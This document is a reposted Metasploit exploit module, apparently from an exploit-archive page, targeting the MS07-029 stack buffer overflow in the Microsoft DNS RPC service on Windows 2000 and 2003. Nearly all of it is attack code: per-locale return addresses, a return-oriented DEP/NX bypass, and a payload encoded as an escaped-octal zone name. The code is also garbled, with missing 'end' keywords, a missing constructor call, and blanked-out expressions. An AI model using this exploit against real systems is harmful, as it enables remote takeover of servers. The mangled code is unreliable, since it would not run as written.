Microsoft DNS RPC Service – ‘extractQuotedChar()’ TCP Overflow (MS07-029) (Metasploit)

  • 作者: Metasploit
    日期: 2010-07-25
  • 类别:
  • 来源:
  • ##
    # $Id: ms07_029_msdns_zonename.rb 9929 2010-07-25 21:37:54Z jduck $
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    require 'msf/core'
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = GreatRanking
    	include Msf::Exploit::Remote::DCERPC
    	def initialize(info = {})
    			'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)',
    			'Description'=> %q{
    					This module exploits a stack buffer overflow in the RPC interface
    				of the Microsoft DNS service. The vulnerability is triggered
    				when a long zone name parameter is supplied that contains
    				escaped octal strings. This module is capable of bypassing NX/DEP
    				protection on Windows 2003 SP1/SP2.
    			'Author' =>
    					'hdm',# initial module
    					'anonymous' # 2 anonymous contributors (2003 support)
    			'License'=> MSF_LICENSE,
    			'Version'=> '$Revision: 9929 $',
    			'References' =>
    					['CVE', '2007-1748'],
    					['OSVDB', '34100'],
    					['MSB', 'MS07-029'],
    					['URL', '']
    			'Privileged' => true,
    			'DefaultOptions' =>
    					'EXITFUNC' => 'thread'
    					'Space'=> 500,
    					# The payload doesn't matter, but make_nops() uses these too
    					'BadChars' => "\x00",
    					'StackAdjustment' => -3500,
    			'Platform' => 'win',
    					[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
    					# WS2HELP.DLL
    					[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
    					[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
    					[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
    					# Use the __except_handler3 method (and jmp esp in ATL.dll)
    					[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
    					[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
    					# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
    					[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
    					[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
    					[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
    					[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
    					[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
    			'DisclosureDate' => 'Apr 12 2007',
    			'DefaultTarget'=> 0 ))
    				Opt::RPORT(0),'Locale', [ true,"Locale for automatic target (English, French, Italian, ...)", 'English'])
    			], self.class)
    	def gettarget(os)
    		targets.each do |target|
    			if ((target['OS'] =~ /#{os}/) && ( =~ /#{datastore['Locale']}/))
    				return target
    		return nil
    	def exploit
    		# Ask the endpoint mapper to locate the port for us
    		dport = datastore['RPORT'].to_i
    		if ((dport != 0) && ( =~ /Automatic/))
    			print_error("Unable to use automatic targeting when RPORT is given");
    		if (dport == 0)
    			dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp')
    			if (not dport)
    				print_error("Could not determine the RPC port used by the Microsoft DNS Server")
    			print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")
    		mytarget = nil
    		if ( =~ /Automatic/)
    			# scheduler service is only available on 2k3 SP0 and 2000
    			schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '1ff70682-0a51-30e8-076d-740be8cee98b', '1.0', 'ncacn_ip_tcp')
    			if (not schedport)
    				print_status("Detected a Windows 2003 SP1-SP2 target...")
    				mytarget = gettarget('2003SP12')
    				# only available on 2003 SP0
    				schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp')
    				if (not schedport)
    					print_status("Detected a Windows 2000 SP0-SP4 target...")
    					mytarget = gettarget('2000')
    					print_status("Detected a Windows 2003 SP0 target...")
    					mytarget = gettarget('2003SP0')
    			if (not mytarget)
    				print_error("There is no available target for this locale")
    			mytarget = target
    		# Connect to the high RPC port
    		connect(true, { 'RPORT' => dport })
    		print_status("Trying target #{}...")
    		# Bind to the service
    		handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    		print_status("Binding to #{handle} ...")
    		print_status("Bound to #{handle} ...")
    		# Create our buffer with our shellcode first
    		txt = Rex::Text.rand_text_alphanumeric(8192)
    		if (target['OS'] =~ /2000/)
    			txt[0, payload.encoded.length] = payload.encoded
    			off = target['Off']
    			txt[ off ] = [mytarget.ret].pack('V')
    			txt[ off - 4, 2] = "\xeb\x06"
    			txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
    		elsif (target['OS'] =~ /2003SP0/)
    			txt[0, payload.encoded.length] = payload.encoded
    			off = target['Off']
    			txt[ off ] = [mytarget['Rets'][0]].pack('V')# __except_handler3
    			txt[ off - 4, 2] = "\xeb\x16"
    			# addr = A + B*12 + 4 = 0x77f7e7f0(ntdll -> 0x77f443c9)
    			addr= mytarget['Rets'][1] - 4
    			addr1 = addr / 2
    			addr2 = addr1 + addr % 2
    			addr1 = addr1 + (addr2 % 12)
    			addr2 = addr2 / 12
    			txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B
    			# then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here :
    			# 0x77f443c9 jmp off_77f7e810[edx*4] ;edx = 0 so jmp to 77f443d0
    			# 0x77f443d0 mov eax, [ebp+arg_0]
    			# 0x77f443d3 pop esi
    			# 0x77f443d4 pop edi
    			# 0x77f443d5 leave; mov esp, ebp
    			# 0x77f443d6 retn ; ret
    			txt[ off + 16, 4] = [mytarget['Rets'][2]].pack('V')# jmp esp
    			txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')
    		elsif (mytarget['OS'] =~ /2003SP12/)
    			off = mytarget['Off']
    			ib= mytarget['IB']
    			txt[ off ] = [ib + 0x2566].pack('V')
    			# to bypass NX we need to emulate the call to ZwSetInformationProcess
    			# with generic value (to work on SP1-SP2 + patches)
    			off = 445
    			# first we set esi to 0xed by getting the value on the stack
    			# 0x76a81da7:
    			# pop esi <- esi = edh
    			# retn
    			txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V')
    			txt[ off + 28, 4] = [0xed].pack('V')
    			# now we set ecx to 0x7ffe0300, eax to 0xed
    			# 0x76a81da4:
    			# pop ecx<-ecx = 0x7ffe0300
    			# mov eax, esi <- eax == edh
    			# pop esi
    			# retn
    			txt[ off + 32, 4] = [ib + 0x1da4].pack('V')
    			txt[ off + 36, 4] = [0x7ffe0300].pack('V')
    			# finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4)
    			# 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX
    			# 0x76a8109c:
    			# call dword ptr [ecx]
    			txt[ off + 44, 4] = [ib + 0x109c].pack('V')# call dword ptr[ecx]
    			txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV')
    			# we catch the second exception to go back to our shellcode, now that
    			# NX is disabled
    			off = 1013
    			txt[ off, 4 ] = [ib + 0x135bf].pack('V') # (jmp esp in atl.dll)
    			txt[ off + 24, payload.encoded.length ] = payload.encoded
    		req = ''
    		# Convert the string to escaped octal
    		txt.unpack('C*').each do |c|
    			req << "\\"
    			req << c.to_s(8)
    		# Build the RPC stub data
    		stubdata =
    			NDR.long(rand(0xffffffff)) +
    			NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +
    			NDR.long(rand(0xffffffff)) +
    			NDR.string(req + "\x00") +
    			NDR.long(rand(0xffffffff)) +
    			NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")
    		print_status('Sending exploit...')
    			response =, stubdata)
    			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
    				print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
    		rescue ::Exception => e
    			print_error("Error: #{e}")